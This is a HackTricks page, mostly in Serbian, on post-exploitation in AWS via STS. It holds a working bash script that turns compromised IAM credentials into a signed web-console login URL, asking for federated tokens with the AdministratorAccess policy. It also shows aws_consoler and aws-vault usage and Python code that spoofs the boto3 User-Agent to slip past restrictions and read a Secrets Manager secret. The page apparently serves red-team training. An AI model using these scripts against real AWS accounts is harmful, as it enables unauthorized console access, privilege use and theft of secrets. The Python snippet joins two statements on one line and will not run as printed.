AWS - STS Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

STS

For more information:

AWS - IAM, Identity Center & SSO Enum

From IAM Creds to Console

Ako ste uspeli da dobijete neke IAM akreditive, možda ćete biti zainteresovani za pristup web konzoli koristeći sledeće alate. Napomena: korisnik/rola mora imati dozvolu sts:GetFederationToken.

Custom script

Sledeći skript će koristiti podrazumevani profil i podrazumevanu AWS lokaciju (ne gov i ne cn) da vam da potpisanu URL adresu koju možete koristiti za prijavu unutar web konzole:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Možete generisati link za web konzolu sa https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Osigurajte da IAM korisnik ima sts:GetFederationToken dozvolu, ili obezbedite ulogu za preuzimanje.

aws-vault

aws-vault je alat za sigurno čuvanje i pristup AWS akreditivima u razvojnog okruženju.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Možete takođe koristiti aws-vault da dobijete sesiju konzole pretraživača

Obilaženje ograničenja User-Agent-a iz Pythona

Ako postoji ograničenje za izvođenje određenih akcija na osnovu korisničkog agenta koji se koristi (kao što je ograničavanje korišćenja python boto3 biblioteke na osnovu korisničkog agenta), moguće je koristiti prethodnu tehniku da se povežete na web konzolu putem pretraživača, ili možete direktno modifikovati boto3 korisnički agent tako što ćete uraditi:

# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousAWS - Step Functions Post Exploitation NextAWS - VPN Post Exploitation

Last updated 3 days ago